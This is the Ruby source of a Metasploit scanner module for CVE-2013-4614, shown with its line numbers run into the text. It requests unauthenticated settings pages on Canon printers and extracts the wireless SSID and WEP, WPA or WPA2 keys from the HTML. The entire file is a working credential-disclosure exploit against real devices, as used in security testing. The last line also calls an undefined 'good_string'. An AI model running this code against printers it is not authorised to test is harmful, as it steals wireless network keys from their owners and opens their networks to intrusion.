Path: blob/master/modules/auxiliary/scanner/http/canon_wireless.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'nokogiri'67class MetasploitModule < Msf::Auxiliary8include Msf::Auxiliary::Report9include Msf::Exploit::Remote::HttpClient10include Msf::Auxiliary::Scanner1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Canon Printer Wireless Configuration Disclosure',17'Description' => %q{18This module enumerates wireless credentials from Canon printers with a web interface.19It has been tested on Canon models: MG3100, MG5300, MG6100, MP495, MX340, MX870,20MX890, MX920.21},22'License' => MSF_LICENSE,23'Author' => [24'Matt "hostess" Andreko <mandreko[at]accuvant.com>'25],26'References' => [27[ 'CVE', '2013-4614' ],28[ 'OSVDB', '94417' ],29[ 'URL', 'https://www.mattandreko.com/2013/06/canon-y-u-no-security.html']30],31'DisclosureDate' => '2013-06-18',32'Notes' => {33'Reliability' => UNKNOWN_RELIABILITY,34'Stability' => UNKNOWN_STABILITY,35'SideEffects' => UNKNOWN_SIDE_EFFECTS36}37)38)39end4041def get_network_settings42begin43res = send_request_cgi({44'method' => 'GET',45'uri' => '/English/pages_MacUS/lan_set_content.html',46})47rescue48print_error("#{rhost}:#{rport} Could not connect.")49return50end5152if res53if res.code == 2005455html = Nokogiri::HTML(res.body)5657checked_lan_setting = html.xpath '//input[@name="LAN_OPT1" and @checked]'5859if checked_lan_setting.count == 160lan_setting = ''61ssid = ''62case checked_lan_setting[0]['value']63when '0'64lan_setting = 'Do not use LAN'65when '1'66lan_setting = 'Use wired LAN'67when '2'68lan_setting = 'Use wireless LAN'6970ssid_input = html.xpath '//input[@name="LAN_TXT1"]'71ssid = ssid_input[0]['value'] if ssid_input.count == 172end7374return lan_setting, ssid75else76print_error("#{rhost}:#{rport} Could not determine LAN Settings.")77end7879elsif res.code == 40180print_error("#{rhost}:#{rport} Authentication failed")81elsif res.code == 40482print_error("#{rhost}:#{rport} File not found")83end84end85end8687def get_wireless_key88begin89res = send_request_cgi({90'method' => 'GET',91'uri' => "/English/pages_MacUS/wls_set_content.html",92})93rescue94print_error("#{ip}:#{rport} Could not connect.")95return96end9798if res99if res.code == 200100html = Nokogiri::HTML(res.body)101encryption_setting = ''102encryption_key = ''103104checked_encryption_setting = html.xpath '//input[@name="WLS_OPT1" and @checked]'105case checked_encryption_setting[0]['value']106when '0'107encryption_setting = 'None'108when '1'109encryption_setting = 'WEP'110wep_key_inputs = html.xpath '//input[starts-with(@name, "WLS_TXT1") and not(@value="")]'111encryption_key = wep_key_inputs.collect { |x| x['value'] }.join(', ')112when '2'113encryption_setting = 'WPA'114wpa_key_input = html.xpath '//input[@name="WLS_TXT2"]'115encryption_key = wpa_key_input[0]['value']116when '3'117encryption_setting = 'WPA2'118wpa2_key_input = html.xpath '//input[@name="WLS_TXT3"]'119encryption_key = wpa2_key_input[0]['value']120end121122return encryption_setting, encryption_key123124elsif res.code == 401125print_error("#{rhost}:#{rport} Authentication failed")126elsif res.code == 404127print_error("#{rhost}:#{rport} File not found")128end129end130end131132def run_host(ip)133ns = get_network_settings134return if ns.nil?135136data = {137:rhost => rhost,138:rport => rport,139:option => ns[0]140}141if ns[0] == 'Use wireless LAN'142wireless_key = get_wireless_key143data.merge!(144{145:ssid => ns[1],146:encryption_type => wireless_key[0],147:key => wireless_key[1]148}149)150end151152report_note({153:data => data,154:type => 'canon.wireless',155:host => ip,156:port => rport157})158159print_good good_string160end161end162163164